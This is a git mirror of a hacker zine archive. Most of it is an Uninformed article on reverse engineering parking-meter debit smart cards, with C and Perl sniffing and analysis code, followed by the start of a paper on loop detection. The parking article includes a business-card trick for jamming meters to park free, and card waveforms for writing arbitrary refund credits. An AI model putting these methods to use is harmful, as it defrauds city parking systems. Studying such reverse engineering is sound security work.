mirror of
https://github.com/fdiskyou/Zines.git
synced 2025-03-09 00:00:00 +01:00
1st import into tree
This commit is contained in:
parent
1d06a57fbb
commit
6b097ec81b
73 changed files with 41019 additions and 0 deletions
1214
uninformed/1.1.txt
Normal file
File diff suppressed because it is too large
Load diff
1219
uninformed/1.2.txt
Normal file
File diff suppressed because it is too large
Load diff
752
uninformed/1.3.txt
Normal file
                         ==Uninformed Research==

|=-----------------------=[ Smart Parking Meters ]=---------------------=|
|=----------------------------------------------------------------------=|
|=------------------=[ h1kari <h1kari@dachb0den.com> ]=-----------------=|
|
||||
|
||||
--=[ Contents ]=----------------------------------------------------------

  1 - Introduction
  2 - ISO7816
  3 - Synchronous Cards
    3.1 - Memory Cards
    3.2 - Parking Meter Debit Cards
    3.3 - The Simple Hack
  4 - Memory Dump
  5 - Synchronous Smart Card Protocol Sniffing
    5.1 - Sniffer Design
    5.2 - Sniffer Code
  6 - Protocol Analysis
    6.1 - Decoding Data
    6.2 - Timing Graph
    6.3 - Conclusions
  7 - Conclusion
|
||||
|
||||
|
||||
--[ 1 - Introduction ]----------------------------------------------------
|
||||
|
||||
If this whitepaper looks a little familiar to you, I'm going to admit
off the bat that it's based a bit on Phrack 48-10/11 (Electronic Telephone
Cards: How to make your own!) and uses a similar format to Phrack
62-15 (Introduction for Playing Cards for Smart Profits). I highly
recommend you read both of them if you're trying to learn about smart
cards.
|
||||
|
||||
I'm sure that many of you who live near a major city have seen
parking meters that require you to pay money in order to park in a spot.
Upon initial analysis of these devices you'll notice there is a slot for
money to go in. On some, there is also a slot for a Parking Meter Debit
Card that you can purchase from the city. This article will analyze these
Parking Meters and their Debit Cards, show how they tick, and show how you
can defeat their security.
|
||||
|
||||
The end goal, however, is to provide enough information so you can
create your own tools to learn more about smart cards and how they work.
I have no intention of having people use this article to rip off the
government; this is for educational purposes only. My only hope is that by
getting this information out there, security systems will be designed more
thoroughly in the future.
|
||||
|
||||
PARKING METER
|
||||
|
||||
_,-----,_
|
||||
,-' `-,
|
||||
/ ._________. \
|
||||
/ , | 00:00 <+-,-+------ Time/Credits Display
|
||||
Meter Status ----+>'-''---------''-'<+----- Meter Status
|
||||
| ,-------, |
|
||||
| |\ |<+-------+----- Coin Slot
|
||||
Smart Card Slot -----\--+->\ | | /
|
||||
\ '----\--' /
|
||||
\ /
|
||||
\ /
|
||||
\ /
|
||||
\-----------/
|
||||
| ,-------, |
|
||||
Money --------+-+-->o | |
|
||||
| | | |
|
||||
| | | |
|
||||
| '-------' |
|
||||
\---------/
|
||||
| |
|
||||
|
||||
|
||||
For those not familiar with these devices, you can go to various
locations around town and purchase these Parking Meter Debit Cards that
are preloaded with $10, $20, or $50. To explain how to use these, I will
quote the instructions provided on the back of the cards:
|
||||
|
||||
.--------------------------------------------------------------------.
|
||||
/ \
|
||||
| PARKING METER DEBIT CARD |
|
||||
| |
|
||||
| 1. Insert debit card into meter in direction shown by arrow. |
|
||||
| The dollar balance of the card will flash 4 times. |
|
||||
| 2. The Meter will increment in 6 min. segments. |
|
||||
| 3. When desired time is displayed, remove card. |
|
||||
| |
|
||||
| DID YOU BUY TOO MUCH TIME? |
|
||||
| TO OBTAIN EXTRA TIME REFUND |
|
||||
| |
|
||||
| * Insert the same debit card that was used to purchase time |
|
||||
| on the meter. Full 6 minute increments will be credited to |
|
||||
| card. Increments of less than 6 minutes will be lost. |
|
||||
| |
|
||||
| Parking cards may be used for ************** meters |
|
||||
| which have yellow posts. |
|
||||
| |
|
||||
\--------------------------------------------------------------------/
|
||||
|
||||
NOTE: The increments are now 4 min due to raising prices
|
||||
|
||||
I'm not including a lot of information that's provided in the Phrack
articles mentioned above, so if things look a little incomplete,
please read through them before emailing me with questions.
|
||||
|
||||
Here's a list of all of my resources:

- The ISO7816 Standard
- Phrack 48-10/11 & 62-15
- Towitoko ChipDrive 130
- Homebrew Synchronous Protocol Sniffer (Schematics Included)
- A few Parking Meter Debit Cards
- A few Parking Meters
- Computer with a Parallel Port
- A business card or two
|
||||
|
||||
|
||||
--[ 2 - ISO7816 ]---------------------------------------------------------
|
||||
|
||||
The ISO 7816 standard is one of the few resources we have to work with
when reverse engineering a smart card. It provides us with basic knowledge
of pin layouts, what the different pins do, and how to interface with
them. Unfortunately, it mostly covers asynchronous cards and doesn't
really touch on how synchronous cards work. For more detailed
information on this, please read Phrack 48-10/11.
|
||||
|
||||
|
||||
--[ 3 - Synchronous Cards ]-----------------------------------------------
|
||||
|
||||
Synchronous protocols are usually used with memory cards, mainly to
reduce cost (since the card doesn't require an internal clock) and because
memory cards usually don't require much logic and are used for simple
applications. Asynchronous cards, on the other hand, have an internal clock
and can communicate with the reader at a fixed rate across the I/O line
(usually 9600 baud). Asynchronous cards are usually used with processor
cards where more interaction is required (see Phrack 62-15).
|
||||
|
||||
|
||||
----[ 3.1 - Memory Cards ]------------------------------------------------
|
||||
|
||||
Memory cards use a very simple protocol for sending data. First off,
because synchronous cards don't know anything about timing, their clock is
provided by the reader. In this situation, the reader can set the I/O line
when the clock is low (0v) and the card can set the I/O line when the
clock is high (5v). To dump all of the memory from a card, the reader
first sets the Reset line high to reset the card and keeps the clock
ticking. The first time the Reset line is low and the Clock is raised, the
card will set the I/O line to the value of bit 0 in memory; the second
time it's raised, the card will set the I/O line to the value of bit 1,
and so on. This is repeated until all of the data is dumped from the
card.
|
||||
|
||||
__________________
|
||||
_| |___________________________________________ Reset
|
||||
: :
|
||||
: _____ : _____ _____ _____ _____
|
||||
_:_______| |____:_| |_____| |_____| |_____| Clk
|
||||
: : : : : : : : : :
|
||||
_:_______:__________:_:_____:_____:_____:_____:_____:_____:_____
|
||||
_:___n___|_____0____:_|_____1_____|_____2_____|_____3_____|___4_ (Address)
|
||||
: : : : :
|
||||
_: :_______:___________:___________:___________
|
||||
_XXXXXXXXXXXXXXXXXXXX_______|___________|___________|___________ Data
|
||||
Bit n Bit 0 Bit 1 Bit2 Bit3
|
||||
|
||||
(Borrowed from Stephane Bausson's paper re-published in Phrack 48-10)
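
The read sequence described above can be sketched as a small software
model. This is only an illustration under stated assumptions: the struct,
the function names, and the LSB-first bit order within each byte are all
hypothetical, and real cards differ in exactly when the address counter
advances.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical model of a synchronous memory card: a bit array plus an
 * address counter that advances on rising clock edges. */
struct sync_card {
    const uint8_t *mem;  /* card memory */
    size_t nbits;        /* number of bits on the card */
    size_t addr;         /* current bit address */
    int clk;             /* last clock level seen */
    int primed;          /* set once bit 0 has been presented */
};

/* Apply one set of Reset/Clock levels and return the level the card
 * drives on I/O. Assumes LSB-first bit order inside each byte. */
int card_step(struct sync_card *c, int rst, int clk)
{
    int rising = clk && !c->clk;

    c->clk = clk;
    if (rst) {                      /* Reset high: rewind to bit 0 */
        c->addr = 0;
        c->primed = 0;
    } else if (rising) {            /* Reset low, clock raised */
        if (c->primed)
            c->addr = (c->addr + 1) % c->nbits;
        c->primed = 1;
    }
    return (c->mem[c->addr / 8] >> (c->addr % 8)) & 1;
}

/* Reader side: pulse Reset, then clock out nbits bits into out. */
void reader_dump(struct sync_card *c, uint8_t *out, size_t nbits)
{
    size_t i;

    card_step(c, 1, 0);             /* Reset high, clock keeps ticking */
    card_step(c, 1, 1);
    card_step(c, 1, 0);
    card_step(c, 0, 0);             /* release Reset */

    for (i = 0; i < nbits; i++) {
        int bit = card_step(c, 0, 1);   /* raise clock, sample I/O */

        card_step(c, 0, 0);             /* lower clock again */
        if (bit)
            out[i / 8] |= (uint8_t)(1u << (i % 8));
        else
            out[i / 8] &= (uint8_t)~(1u << (i % 8));
    }
}
```

Calling reader_dump() on a card initialized with a two-byte memory image
and nbits set to 16 should hand back the same two bytes, which is a quick
way to sanity-check the model before pointing similar logic at real
hardware.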
|
||||
|
||||
|
||||
----[ 3.2 - Parking Meter Debit Cards ]-----------------------------------
|
||||
|
||||
Parking Meter Debit Cards behave very similarly to standard memory
cards, however they also have to provide some basic security to make sure
people can't get free parking. This is done using a method similar to
the European Telephone Cards (SLE4406): a section of memory on the card
acts as a one-way counter. Bits are set to a certain amount of credits,
then a security fuse is blown, and from then on the set bits can only be
flipped from 1 -> 0. This is a standard security mechanism that
makes it so people cannot recharge their cards once the credits have been
used. The only catch is that the way the parking meters work makes it
so you can refund unused credits to the card.
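
As a rough illustration of the one-way counter idea (not of any specific
card), the write rule after the fuse is blown amounts to a bitwise AND:
a write can clear bits but never set them. The function names below are
hypothetical, and treating each remaining 1 bit as one unit of credit is
a simplifying assumption.

```c
#include <stddef.h>
#include <stdint.h>

/* After the fuse is blown, a write can only clear bits (1 -> 0).
 * Any bit the caller tries to set back to 1 is silently ignored. */
uint8_t fused_write(uint8_t stored, uint8_t requested)
{
    return stored & requested;
}

/* Count the 1 bits left in a counter region. */
size_t count_set_bits(const uint8_t *mem, size_t len)
{
    size_t n = 0;
    size_t i;

    for (i = 0; i < len; i++) {
        uint8_t b = mem[i];

        while (b != 0) {
            b &= (uint8_t)(b - 1);  /* clear the lowest set bit */
            n++;
        }
    }
    return n;
}
```

With this rule, writing 0xff over a stored 0xf8 leaves 0xf8 untouched,
while writing 0xf0 spends one more bit. The refund behavior mentioned
above is exactly what this simple model does not cover.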
|
||||
|
||||
|
||||
----[ 3.3 - The Simple Hack ]---------------------------------------------
|
||||
|
||||
If my little introduction to Synchronous Smart Cards just went right
over your head, here's an example of how to attack Parking Meters without
having to deal with electronics or code. If you ever try putting an
invalid card into a parking meter, you'll notice that after about 90
seconds of flashing error messages, it will switch over to Out-of-Order
status. Now, for convenience's sake, most cities allow you to park for free
in Out-of-Order spots. (Anyone see a loophole here???)
|
||||
|
||||
.----------------------------------------------------------------------.
|
||||
| : |
|
||||
| : |
|
||||
| : |
|
||||
| : |
|
||||
| : |
|
||||
| : |
|
||||
| : |
|
||||
| : |
|
||||
| : <- insert folded side |
|
||||
| : |
|
||||
| : |
|
||||
| : |
|
||||
| : |
|
||||
| : |
|
||||
| : |
|
||||
| : |
|
||||
| : |
|
||||
| : |
|
||||
'----------------------------------------------------------------------'
|
||||
|
||||
One simple method for making it less obvious that something in the
slot is putting the meter Out-of-Order is to fold a business
card in half (preferably not yours) and insert it into the smart card
slot. It should be the perfect length, so that it will go in and be very
difficult to notice and/or take out. When you're finished parking, you
should be able to pull the business card out using a credit card or small
flathead screwdriver.
|
||||
|
||||
|
||||
--[ 4 - Memory Dump ]-----------------------------------------------------
|
||||
|
||||
To explain how the cards handle credits and refunds, I'll first show
you how the memory on the card is laid out. This dump was done using my
Towitoko ChipDrive 130 with Towitoko's SmartCard Editor Software (very
useful). I highly suggest that you use a commercial smart card reader or
some sort of non-dumb reader for dealing with synchronous cards; dumb
mouse (and most home-brew) readers only work with asynchronous cards.
|
||||
|
||||
0x00: 9814 ff3c 9200 46b1 ffff ffff ffff ffff
0x10: ffff ffff ffff ff00 0000 0000 0000 0000
0x20: 0000 0000 0000 0000 0000 0000 0000 0000
0x30: 0000 0000 0000 0000 0000 0000 0000 0000
0x40: 0000 0000 0000 0000 0000 0000 0000 0000
0x50: 0000 0000 f8ff ffff ffff ffff fffc ffff
0x60: ffff ffff ffff ffff ffff ffff ffff ffff
0x70: ffff ffff ffff ffff ffff ffff ffff ffff
0x80: ffff ffff ffff ffff ffff ffff ffff ffff
0x90: ffff ffff ffff ffff ffff ffff ffff ffff
0xa0: fcff ffff ffff ffff ffff ffff ffff ffff
0xb0: ffff ffff ffff ffff ffff ffff ffff ffff
0xc0: ffff ffff
|
||||
|
||||
Now, if we convert the 0x50 line to bits and analyze it, we'll
notice this (note that bit-endianness is reversed):

0x50: 0000 0000 0000 0000 0000 0000 0000 0000
0x54: 0001 1111 1111 1111 1111 1111 1111 1111
0x58: 1111 1111 1111 1111 1111 1111 1111 1111
0x5c: 1111 1111 0011 1111 1111 1111 1111 1111
|
||||
|
||||
For every bit that is 1 between 0x17 and 0x55:1 (note: :x notation
specifies bit offset), you get $0.10 on your card. For every bit that is 0
between 0x5b and 0xb0 you get $0.10 in refunds. The total of these two
counters equals the amount of credits on your card. Refunds are handled
through the buffer of bits in between 0x55:1 and 0x5b, which can be used
if there are refund bits that can be spent. This
only allows the user to use ~ $5 worth of refund bits. On this particular
card, the user has $0.60 worth of credits and $0.20 worth of refunds,
making a total of $0.80 on the card (I know, I'm poor :-/).
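
The bit-order reversal applied to the 0x50 line above can be reproduced
with a short helper. This is a minimal sketch; the function names are
mine and are not part of any reader software.

```c
#include <stdint.h>

/* Reverse the bit order of one byte (bit 0 <-> bit 7, and so on). */
uint8_t reverse_bits(uint8_t b)
{
    uint8_t r = 0;
    int i;

    for (i = 0; i < 8; i++) {
        r = (uint8_t)((r << 1) | (b & 1));
        b >>= 1;
    }
    return r;
}

/* Render a byte as two space-separated nibbles, e.g. "0001 1111".
 * out needs room for 10 chars (9 characters plus the NUL). */
void format_bits(uint8_t b, char out[10])
{
    int pos = 0;
    int i;

    for (i = 7; i >= 0; i--) {
        out[pos++] = (char)('0' + ((b >> i) & 1));
        if (i == 4)
            out[pos++] = ' ';
    }
    out[pos] = '\0';
}
```

Feeding the dumped byte 0xf8 (offset 0x54) through reverse_bits() gives
0x1f, which format_bits() renders as "0001 1111", matching the start of
the 0x54 row in the bit listing. The byte 0xfc becomes 0x3f the same way.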
|
||||
|
||||
|
||||
--[ 5 - Synchronous Smart Card Protocol Sniffing ]------------------------
|
||||
|
||||
Now that we've figured out how they store credits on the card, we need
to figure out how the reader writes to the card. To do this, we'll need
to somehow sniff the connection and reverse engineer their protocol. The
following section will show you how to make your own synchronous smart
card protocol sniffer and give you code for sniffing the connection.
|
||||
|
||||
|
||||
----[ 5.1 - Sniffer Design ]----------------------------------------------
|
||||
|
||||
There's plenty of commercial hardware out there (Season) that allows
you to sniff asynchronous smart cards, but it's a totally different story
for synchronous cards. I wasn't able to find any hardware to do this and,
being totally dumb when it comes to electronics, found someone to help me
out with this design (thx XElf). It basically taps the lines between a
smart card and the reader and runs the signals through an externally
powered buffer to make sure our parallel port doesn't drain the
connection.
|
||||
|
||||
My personal implementation consists of a smart card socket I ripped
out of an old smart card reader, a Peet's coffee card that I made ISO7816
pinouts on using copper tape, all connected by torn apart floppy drive
cables, and powered by a ripped apart USB cable. You should be able to
find some pics on the net if you search around, although I guarantee
whatever you come up with will be less ghetto than mine.
|
||||
|
||||
|
||||
Parallel Port
|
||||
|
||||
D10 - Ack - I6 o-------------------------,
|
||||
|
|
||||
D11 - Busy - I7 o-----------------------------,
|
||||
| |
|
||||
D12 - Paper Out - I5 o---------------------------------,
|
||||
| | |
|
||||
D13 - Select - I4 o-------------------------------------,
|
||||
| | | |
|
||||
D25 - Gnd o-----, | | | |
|
||||
| | | | |
|
||||
| | | | |
|
||||
External 5V (USB) | | | | |
|
||||
| | | | |
|
||||
5V o------------------, | | | | |
|
||||
| | | | | |
|
||||
0V o-------*----*-----|---*-------------------|---|---|---|-----,
|
||||
| | | | | | | | |
|
||||
| | ,--==--==--==--==--==--==--==--==--==--==--, |
|
||||
__+__ | |_ 20 19 18 17 16 15 14 13 12 11 | |
|
||||
///// | | ] 74HCT541N | |
|
||||
| |' 1 2 3 4 5 6 7 8 9 10 | |
|
||||
| '--==--==--==--==--==--==--==--==--==--==--' |
|
||||
| | | | | | | | | | | |
|
||||
| | '---*---*---* | | | | '-----'
|
||||
'-----*---------, ,---|---* | | |
|
||||
| | ,-|---|---* | |
|
||||
Smart Card | | | | | | *---|------,
|
||||
,----------,----------, | | | | | | | *----, |
|
||||
,-------|--* Vcc | Gnd *--|-* | | | ,-, ,-, ,-, ,-, | |
|
||||
| |----------|----------| | | | | | | | | | | | | | |
|
||||
| ,-----|--* Reset | Vpp | | | | | | | | | | | | | | |
|
||||
| | |----------|----------| | | | | |_| |_| |_| |_| | |
|
||||
| | ,---|--* Clock | I/O *--|---|-* | |r1 |r2 |r3 |r4 | |
|
||||
| | | |----------|----------| | | | | |10k|10k|10k|10k | |
|
||||
| | | ,-|--* RF1 | RF2 *--|---* | | | | | | | |
|
||||
| | | | '----------'----------' | | | '---*---*---*---' | |
|
||||
| | *-|-------------------------|-|-|----------------------' |
|
||||
| *-|-|-------------------------|-|-|------------------------'
|
||||
| | | | | | |
|
||||
| | | | Smart Card Reader | | |
|
||||
| | | | ,----------,----------, | | |
|
||||
'-------|--* Vcc | Gnd *--|-' | |
|
||||
| | | |----------|----------| | |
|
||||
'-----|--* Reset | Vpp | | |
|
||||
| | |----------|----------| | |
|
||||
'---|--* Clock | I/O *--|---' |
|
||||
| |----------|----------| |
|
||||
'-|--* RF1 | RF2 *--|-----'
|
||||
'----------'----------'
|
||||
|
||||
|
||||
----[ 5.2 - Sniffer Code ]------------------------------------------------
|
||||
|
||||
To monitor the connection, compile and run this code with a log
filename as an argument. This code is written for OpenBSD and uses its
i386_iopl() function to get access to the I/O ports. You may need
to modify it to work on other OSs. Due to file i/o speed limitations, it
buffers samples in memory and only writes the log file when you hit ctrl+c.
|
||||
|
||||
|
||||
/*
 * Synchronous Smart Card Logger v1.0 [synclog.c]
 * by h1kari <h1kari@dachb0den.com>
 */
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <sys/types.h>
#include <machine/sysarch.h>
#include <i386/pio.h>

#define BASE    0x378
#define DATA    (BASE)
#define STATUS  (BASE + 1)
#define CONTROL (BASE + 2)
#define ECR     (BASE + 0x402)
#define BUF_MAX (1024 * 1024 * 8)   /* max log size 8mb */

int bufi = 0;
u_char buf[BUF_MAX];
char *logfile;

/* write the top four status bits of one sample as a line of 0s and 1s */
void
printbits(FILE *fh, int b)
{
    fprintf(fh, "%d%d%d%d\n",
        (b >> 7) & 1, (b >> 6) & 1,
        (b >> 5) & 1, (b >> 4) & 1);
}

/* dump the captured samples to the log file and exit */
void
die(int signo)
{
    int i;
    FILE *fh;

    /* open logfile and write output */
    if((fh = fopen(logfile, "w")) == NULL) {
        perror("unable to open lpt log file");
        exit(1);
    }
    for(i = 0; i < bufi; i++)
        printbits(fh, buf[i]);

    /* flush and exit out */
    fflush(fh);
    fclose(fh);
    _exit(0);
}

int
main(int argc, char *argv[])
{
    unsigned char b, c;

    if(argc < 2) {
        fprintf(stderr, "usage: %s <file>\n", argv[0]);
        exit(1);
    }

    logfile = argv[1];

    /* enable port writing privileges */
    if(i386_iopl(3)) {
        printf("You need to be superuser to use this\n");
        exit(1);
    }

    /* clear status flags */
    outb(STATUS, inb(STATUS) & 0x0f);

    /* set epp mode, just in case */
    outb(ECR, (inb(ECR) & 0x1f) | 0x80);

    /* log to file when we get ctrl+c */
    signal(SIGINT, die);

    /* fetch dataz0r */
    c = 0;
    while(bufi < BUF_MAX) {
        /* select low nibble */
        outb(CONTROL, (inb(CONTROL) & 0xf0) | 0x04);

        /* read the status lines; skip samples where nothing changed */
        if((b = inb(STATUS)) == c)
            continue;

        buf[bufi++] = c = b;    /* save last state bits */
    }

    /* capture buffer is full: write out what we have */
    printf("buffer overflow!\n");
    die(0);
    return 0;   /* not reached */
}
|
||||
|
||||
|
||||
It might also help to raise the scheduling priority (lower the nice
value) when running it, if it looks like you're having timing issues:
|
||||
|
||||
# nice -n -20 ./synclog file.log
|
||||
|
||||
|
||||
--[ 6 - Protocol Analysis ]-----------------------------------------------
|
||||
|
||||
Once we get our log of the connection, we'll need to run it through
some tools to analyze and decode the protocol. I've put together a couple
of simple tools that'll make your life a lot easier. One will simply
decode the bytes that are transferred across based on the state changes.
The other will graph out the whole conversation 2-dimensionally so you
can graphically view patterns in the connection.
|
||||
|
||||
|
||||
----[ 6.1 - Decoding Data ]-----------------------------------------------
|
||||
|
||||
For decoding the data, we simply record bits to an input buffer when
the clock is in one state, and to an output buffer when the clock is in
the other. Then we dump all of the bytes and reset our counters whenever
there's a reset. This should give us a dump of the data that's being
transferred between the two devices.
|
||||
|
||||
|
||||
/*
 * Synchronous Smart Card Log Analyzer v1.0 [analyze.c]
 * by h1kari <h1kari@dachb0den.com>
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>

#ifdef PRINTBITS
#define BYTESPERROW 8
#else
#define BYTESPERROW 16
#endif

#define BUF_MAX (1024 * 1024)

void
pushbit(u_char *byte, u_char bit, u_char n)
{
    /* set bit n (counted from the msb) of byte to the specified bit */
    *byte &= ~(1 << (7 - n));
    *byte |= (bit << (7 - n));
}

void
printbuf(u_char *buf, int len, char *io)
{
    int i;

    printf("%s:\n", io);

    for(i = 0; i < len; i++) {
#ifdef PRINTBITS
        int j;

        for(j = 7; j >= 0; j--)
            printf("%d", (buf[i] >> j) & 1);
        putchar(' ');
#else
        printf("%02x ", buf[i]);
#endif
        if((i % BYTESPERROW) == BYTESPERROW - 1)
            printf("\n");
    }

    if((i % BYTESPERROW) != 0) {
        printf("\n");
    }
}

int
main(int argc, char *argv[])
{
    u_char ibit = 0, obit = 0;
    u_char ibyte = 0, obyte = 0;
    u_char clk, rst, bit;
    u_char lclk;
    /* static: two 1mb arrays are too big to risk on the stack */
    static u_char ibuf[BUF_MAX], obuf[BUF_MAX];
    int ii = 0, oi = 0;
    char line[1024];
    FILE *fh;

    if(argc < 2) {
        fprintf(stderr, "usage: %s <file>\n", argv[0]);
        exit(1);
    }

    if((fh = fopen(argv[1], "r")) == NULL) {
        perror("unable to open lpt log");
        exit(1);
    }

    lclk = 2;   /* 2 = no clock state seen yet */
    while(fgets(line, sizeof(line), fh) != NULL) {
        /* each log line holds four 0/1 characters; skip short lines */
        if(strlen(line) < 4)
            continue;

        bit = line[0] - '0';
        rst = line[2] - '0';
        clk = line[3] - '0';
        bit = bit ? 0 : 1;  /* data bit is logged inverted */

        if(lclk == 2) lclk = clk;

        /* print out buffers when we get a reset */
        if(rst) {
            if(ii > 0 && oi > 0) {
                printbuf(ibuf, ii, "input");
                printbuf(obuf, oi, "output");
            }
            ibit = obit = 0;
            ibyte = obyte = 0;
            ii = oi = 0;
        }

        /* if clock high input */
        if(clk) {
            /* incr on clock change */
            if(lclk != clk) obit++;
            pushbit(&ibyte, bit, ibit);
        /* otherwise output */
        } else {
            /* incr on clock change */
            if(lclk != clk) ibit++;
            pushbit(&obyte, bit, obit);
        }

        /* next byte */
        if(ibit == 8) {
            if(ii < BUF_MAX)
                ibuf[ii++] = ibyte;
            ibit = 0;
        }

        if(obit == 8) {
            if(oi < BUF_MAX)
                obuf[oi++] = obyte;
            obit = 0;
        }

        /* save last clock */
        lclk = clk;
    }

    fclose(fh);
    return 0;
}
|
||||
|
||||
|
||||
----[ 6.2 - Timing Graph ]------------------------------------------------
|
||||
|
||||
Sometimes it really helps to see data graphically instead of just a
bunch of hex and 1's and 0's, so my friend pr0le threw together this Perl
script that creates an image with a time diagram of the lines.
Analyzing this made it easier to see how they were performing reads
and writes to the card.
|
||||
|
||||
|
||||
|
||||
#!/usr/bin/perl
use strict;
use warnings;
use GD;

my $logfile = shift || die "usage: $0 <logfile>\n";

open( my $in, '<', $logfile ) or die "unable to open $logfile: $!\n";
my @lines = <$in>;
close( $in );

my $len = 3;    # pixels per sample

my $im_len = scalar( @lines );
my $w = $im_len * $len;
my $h = 100;

my $im = GD::Image->new( $w, $h );
my $white = $im->colorAllocate( 255, 255, 255 );
my $black = $im->colorAllocate( 0, 0, 0 );

$im->fill( 0, 0, $white );

my $i = 1;
my $init = 0;
my ($bit1,$bit2,$rst,$clk);
my ($lbit1,$lbit2,$lrst,$lclk);
foreach my $line ( @lines ) {
    # each log line is four 0/1 characters; skip anything else
    ($bit1,$bit2,$rst,$clk) = ($line =~ m/^(\d)(\d)(\d)(\d)/) or next;
    if( $init ) {
        print_bit( $lbit1, $bit1, 10 );
        print_bit( $lbit2, $bit2, 30 );
        print_bit( $lrst, $rst, 50 );
        print_bit( $lclk, $clk, 70 );
    }
    ($lbit1,$lbit2,$lrst,$lclk) = ($bit1,$bit2,$rst,$clk);
    $init = 1;
    $i++;
}

open( my $out, '>', "$logfile.jpg" ) or die "unable to write $logfile.jpg: $!\n";
binmode $out;
print $out $im->jpeg;
close( $out );

exit;

# draw one sample of one signal: a vertical edge if the level changed,
# then a horizontal segment at the new level
sub print_bit {
    my ($old, $new, $ybase) = @_;

    my $x = $i * $len;
    my $y = $ybase + ( $new ? 20 : 10 );

    if( $new != $old ) {
        $im->line( $x, $ybase+10, $x, $ybase+20, $black );
    }
    $im->line( $x, $y, $x+$len, $y, $black );

    return;
}
|
||||
|
||||
|
||||
----[ 6.3 - Conclusions ]-------------------------------------------------
|
||||
|
||||
These tools showed how the reserved lines on the smart card are used in
conjunction with credit increments and decrements. This is an analysis of
how the reader triggers a credit deduct or add on the card:
|
||||
|
||||
|
||||
DEDUCT $0.10:
|
||||
|
||||
___________ ___________
|
||||
_________| |___________| |__________________ Reset
|
||||
____________________________________
|
||||
_____________________| |_____ Clk
|
||||
___________
|
||||
_________| |__________________________________________ I/O
|
||||
___________
|
||||
_________| |__________________________________________ Rsv1
|
||||
|
||||
Then issue write command:
|
||||
00011001 00101000 11111111 00111100
|
||||
01001001 00000000 01100010 10001101
|
||||
11111111 11111111 01110111 10101101
|
||||
|
||||
|
||||
ADD $0.20:
|
||||
|
||||
___________ ___________ _____
|
||||
_________| |___________| |____________| Reset
|
||||
____________________________________
|
||||
_____________________| |_____ Clk
|
||||
_____________________________________________
|
||||
|__________________ I/O
|
||||
___________________________________
|
||||
_________| |__________________ Rsv1
|
||||
|
||||
Then issue write command:
|
||||
00011001 00101000 11111111 00111100
|
||||
01001001 00000000 01100010 10001101
|
||||
11111111 11111111 01110111 10101101
|
||||
_____
|
||||
__________________________________________________________| Reset
|
||||
________ ___________ ____________
|
||||
| |___________| |___________| |_____ Clk
|
||||
____________________ ________________________
|
||||
| |___________| |_____ I/O
|
||||
____________________ ________________________
|
||||
| 1 Credit |___________| 2 Credits |_____ Rsv1
|
||||
|
||||
|
||||
Since the parking meter will refund whatever remaining amount there is
to the card and doesn't have to do it one at a time like with decrements,
the write command supports writing multiple credits back onto the card.
Simply repeat the waveform above and assert Reset when you're finished
"refunding" however many credits you want.
|
||||
|
||||
|
||||
--[ 7 - Conclusion ]------------------------------------------------------
|
||||
|
||||
By now, you're probably thinking that this article sucks because there
isn't any ./code that will just give you more $. Unfortunately, most
security smart card protocols are fairly proprietary and whatever code I
released probably wouldn't work in your particular city. And all of the
data and waveforms I've included in this article probably give the city
they do correspond to enough info to start camping white vans on my
front lawn. ;-o
|
||||
|
||||
Instead of lame vendor-specific code, we're aiming to give you
something much more powerful in the next part of this article, which will
allow you to emulate arbitrary smart cards and simple electronic
protocols (thx spidey). So stay tuned for the next Uninformed article
from Dachb0den Labs.
|
||||
|
||||
-h1kari 0ut
|
380
uninformed/1.4.txt
Normal file
Loop Detection
Peter Silberman
peter.silberman@gmail.com
|
||||
|
||||
1) Foreword
|
||||
|
||||
Abstract: During the course of this paper the reader will gain new knowledge
about previous and new research on the subject of loop detection. The topic of
loop detection will be applied to the field of binary analysis and a case study
will be given to illustrate its uses. All of the implementations provided in
this document have been written in C/C++ as Interactive Disassembler (IDA)
plug-ins.
|
||||
|
||||
Thanks: The author would like to thank Pedram Amini, thief, Halvar Flake,
skape, trew, Johnny Cache and everyone else at nologin who helped with ideas
and kept those creative juices flowing.
|
||||
|
||||
|
||||
2) Introduction
|
||||
|
||||
The goal of this paper is to educate the reader both about why loop detection
is important and how it can be used. When a security researcher thinks of
insecure coding practices, things like calls to strcpy and sprintf are some of
the first things to come to mind. These function calls are considered low
hanging fruit. Some security researchers think of integer overflows or
off-by-one copy errors as types of vulnerabilities. However, not many people
consider, or think to consider, the misuse of loops as a security problem.
With that said, loops have been around since the beginning of time (i.e. since
the first programming languages). The need for a language to iterate over data
to analyze each object or character has always been there. Still, not everyone
thinks to look at a loop for security problems. What if a loop doesn't
terminate correctly? Depending on the operation the loop is performing, it's
possible that it could corrupt surrounding memory regions if not properly
managed. If the loop frees memory that no longer exists or is not memory at
all, a double-free bug may have been found. These are all things that could,
and do, happen in a loop.
|
||||
|
||||
As the low hanging fruit is eliminated in software by security researchers and
companies doing decent to moderate QA testing, security researchers have to
look elsewhere to find vulnerabilities in software. One area that has only
been touched on briefly in the public realm is how loops operate when
translated to binaries. (BugScan is an example of a company that has
implemented "buffer iteration" detection but hasn't talked publicly about it;
see http://www.logiclibrary.com.) The reader may ask: why would one want to
look at loops? Well, a lot of companies implement their own custom string
routines, like strcpy and strcat, which tend to be just as dangerous as the
standard string routines. These functions tend to go un-analyzed because there
is no quick way to say that they are copying a buffer. For this reason, loop
detection can help the security researcher identify areas of interest. During
the course of this article the reader will learn of the different ways to
detect loops using graph analysis, how to implement loop detection, see a new
loop detection IDA plug-in, and a case study that will tie it all together.
|
||||
|
||||
|
||||
3) Algorithms Used to Detect Loops
|
||||
|
||||
A lot of research has been done on the subject of loop detection. The
research, however, was not done for the purpose of finding and exploiting
vulnerabilities that exist inside of loops. Most research has been done with
an interest in recognizing and optimizing loops. (A good article about loop
optimization and compiler optimization is
http://www.cs.princeton.edu/courses/archive/spring03/cs320/notes/loops.pdf .)
Research on the optimization of loops has led scientists to classify various
types of loops. There are two distinct categories to which any loop will
belong. Either the loop will be an irreducible loop, defined as "loops with
multiple entry [points]"
(http://portal.acm.org/citation.cfm?id=236114.236115), or a reducible loop,
defined as "loops with one entry [point]"
(http://portal.acm.org/citation.cfm?id=236114.236115). Given that there are
two distinct categories, it stands to reason that the two types of
loops are detected in different fashions. Two popular papers on loop detection
are "Interval Finding Algorithm" and "Identifying Loops Using DJ Graphs". This
document will cover the most widely accepted theory on loop detection.
|
||||
|
||||
|
||||
3.1) Natural Loop Detection
|
||||
|
||||
One of the most well-known algorithms for loop detection is demonstrated in the
